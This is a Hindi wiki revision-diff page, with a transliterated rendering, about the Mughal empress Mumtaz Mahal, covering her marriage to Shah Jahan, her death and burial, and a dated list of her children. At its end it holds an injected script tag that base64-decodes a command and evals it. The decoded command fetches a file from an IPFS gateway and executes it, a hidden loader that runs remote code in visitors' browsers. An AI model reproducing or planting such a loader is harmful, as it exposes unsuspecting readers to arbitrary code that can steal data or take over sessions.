Difference between revisions of "मुमताज़ महल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मुमताज़ महल''' (अंग्रेज़ी: ''Mumtaz Mahal'', जन्म: 6 अप्रॅल 1593 – मृ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''मुमताज़ महल''' (अंग्रेज़ी: ''Mumtaz Mahal'', जन्म: 6 अप्रॅल 1593 – मृत्यु: 17 जून 1631) का वास्तविक नाम 'अर्जुमंद बानो बेगम' था। मुमताज़, [[नूरजहाँ]] के भाई [[आसफ़ ख़ाँ (गियासबेग़ पुत्र)|आसफ़ खाँ]] की पुत्री जिसका निकाह [[मुग़ल]] सम्राट [[जहाँगीर]] के पुत्र [[ख़ुर्रम]] ([[शाहजहाँ]]) से हुआ। 19 वर्ष की उम्र में मुमताज़ का निकाह शाहजहाँ से [[10 मई]], 1612 को हुआ। मुमताज़, शाहजहाँ की तीसरी पत्नी थी लेकिन शीघ्र ही वह उनकी सबसे पसंदीदा पत्नी बन गई। शाहजहाँ और मुमताज़ के 13 संतानें हुईं, जिनमें [[दारा शिकोह]], शुजा, [[औरंगजेब]] और [[मुराद बख़्श]] नामक चार पुत्र थे।   
+
'''मुमताज़ महल''' ([[अंग्रेज़ी]]: ''Mumtaz Mahal'', जन्म: 6 अप्रॅल 1593 – मृत्यु: 17 जून 1631) का वास्तविक नाम 'अर्जुमंद बानो बेगम' था। मुमताज़, [[नूरजहाँ]] के भाई [[आसफ़ ख़ाँ (गियासबेग़ पुत्र)|आसफ़ खाँ]] की पुत्री जिसका निकाह [[मुग़ल]] सम्राट [[जहाँगीर]] के पुत्र [[ख़ुर्रम]] ([[शाहजहाँ]]) से हुआ।  
 +
* 19 वर्ष की उम्र में मुमताज़ का निकाह शाहजहाँ से [[10 मई]], 1612 को हुआ। मुमताज़, शाहजहाँ की तीसरी पत्नी थी लेकिन शीघ्र ही वह उनकी सबसे पसंदीदा पत्नी बन गई।  
 +
* शाहजहाँ और मुमताज़ के 13 संतानें हुईं, जिनमें [[दारा शिकोह]], शुजा, [[औरंगज़ेब]] और [[मुराद बख़्श]] नामक चार पुत्र थे।   
 +
* मुमताज़ का निधन [[बुरहानपुर]] में 17 जून, 1631 को 14वीं संतान, बेटी गौहारा बेगम को जन्म देते वक्त हुआ। उसका शव आगरा लाया गया जहाँ शाहजहाँ ने उसकी कब्र पर विश्वविख्यात स्मारक [[ताजमहल]] बनवाया।
 +
==शाहजहाँ और मुमताज़ की संतानें==
 +
* शहज़ादी हुरलनिसा बेग़म (जन्म- 30 मार्च, 1613 - मृत्यु-14 जून, 1616)
 +
* शहज़ादी (शाही राजकुमारी) [[जहाँआरा|जहाँआरा बेगम]]) (जन्म- 2 अप्रैल, 1614 - मृत्यु-16 सितंबर, 1681)
 +
* शहज़ादा (शाही राजकुमार) [[दारा शिकोह]] (जन्म- 30 मार्च, 1615 - मृत्यु-8 सितंबर, 1659)
 +
* शहज़ादा सुल्तान शाह शुजा बहादुर (जन्म- 3 जुलाई, 1616 - मृत्यु-1660)
 +
* शहज़ादी रोशनआरा बेग़म (जन्म- 3 सितंबर, 1617 - मृत्यु-1671)
 +
* बादशाह [[औरंगज़ेब]] (जन्म- 4 नवंबर, 1618 - मृत्यु-21 फरवरी, 1707)
 +
* शहज़ादा सुल्तान उम्मीद बख़्श (जन्म- 18 दिसंबर, 1619 - मृत्यु-मार्च, 1622)
 +
* शहज़ादी सुरैय्या बानो बेग़म (जन्म- 10 जून, 1621 - मृत्यु-28 अप्रैल, 1628)
 +
* शहज़ादा सुल्तान [[मुराद बख़्श]] (जन्म- 8 सितंबर, 1624 - मृत्यु-14 दिसंबर, 1661)
 +
* शहज़ादा सुल्तान लुफ़्ताल्ला (जन्म- 4 नवंबर, 1626 - मृत्यु-14 मई, 1628)
 +
* शहज़ादा सुल्तान दौलत अफ़ज़ा (जन्म- 9 मई, 1628 - मृत्यु-?)
 +
* शहज़ादी हुस्नारा बेग़म (जन्म- 23 अप्रैल, 1630 - मृत्यु-?)
 +
* शहज़ादी गौहारा बेग़म (जन्म- 17 जून, 1631 - मृत्यु-1706)
  
  
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 11: Line 27:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{मुग़ल साम्राज्य}}
[[Category:नया पन्ना नवम्बर-2012]]
+
[[Category:इतिहास कोश]]  
 
+
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 +
[[Category:प्रसिद्ध व्यक्तित्व]]
 +
[[Category:मुग़ल साम्राज्य]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 11:53, 16 November 2012

mumataz mahal (aangrezi: Mumtaz Mahal, janm: 6 aprॅl 1593 – mrityu: 17 joon 1631) ka vastavik nam 'arjumand bano begam' tha. mumataz, noorajahaan ke bhaee asaf khaan ki putri jisaka nikah mugal samrat jahaangir ke putr khurram (shahajahaan) se hua.

  • 19 varsh ki umr mean mumataz ka nikah shahajahaan se 10 mee, 1612 ko hua. mumataz, shahajahaan ki tisari patni thi lekin shighr hi vah unaki sabase pasandida patni ban gee.
  • shahajahaan aur mumataz ke 13 santanean hueean, jinamean dara shikoh, shuja, aurangazeb aur murad bakhsh namak char putr the.
  • mumataz ka nidhan burahanapur mean 17 joon, 1631 ko 14vian santan, beti gauhara begam ko janm dete vakt hua. usaka shav agara laya gaya jahaan shahajahaan ne usaki kabr par vishvavikhyat smarak tajamahal banavaya.

shahajahaan aur mumataz ki santanean

  • shahazadi huralanisa begam (janm- 30 march, 1613 - mrityu-14 joon, 1616)
  • shahazadi (shahi rajakumari) jahaanara begam) (janm- 2 aprail, 1614 - mrityu-16 sitanbar, 1681)
  • shahazada (shahi rajakumar) dara shikoh (janm- 30 march, 1615 - mrityu-8 sitanbar, 1659)
  • shahazada sultan shah shuja bahadur (janm- 3 julaee, 1616 - mrityu-1660)
  • shahazadi roshanara begam (janm- 3 sitanbar, 1617 - mrityu-1671)
  • badashah aurangazeb (janm- 4 navanbar, 1618 - mrityu-21 pharavari, 1707)
  • shahazada sultan ummid bakhsh (janm- 18 disanbar, 1619 - mrityu-march, 1622)
  • shahazadi suraiyya bano begam (janm- 10 joon, 1621 - mrityu-28 aprail, 1628)
  • shahazada sultan murad bakhsh (janm- 8 sitanbar, 1624 - mrityu-14 disanbar, 1661)
  • shahazada sultan luftalla (janm- 4 navanbar, 1626 - mrityu-14 mee, 1628)
  • shahazada sultan daulat afaza (janm- 9 mee, 1628 - mrityu-?)
  • shahazadi husnara begam (janm- 23 aprail, 1630 - mrityu-?)
  • shahazadi gauhara begam (janm- 17 joon, 1631 - mrityu-1706)



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>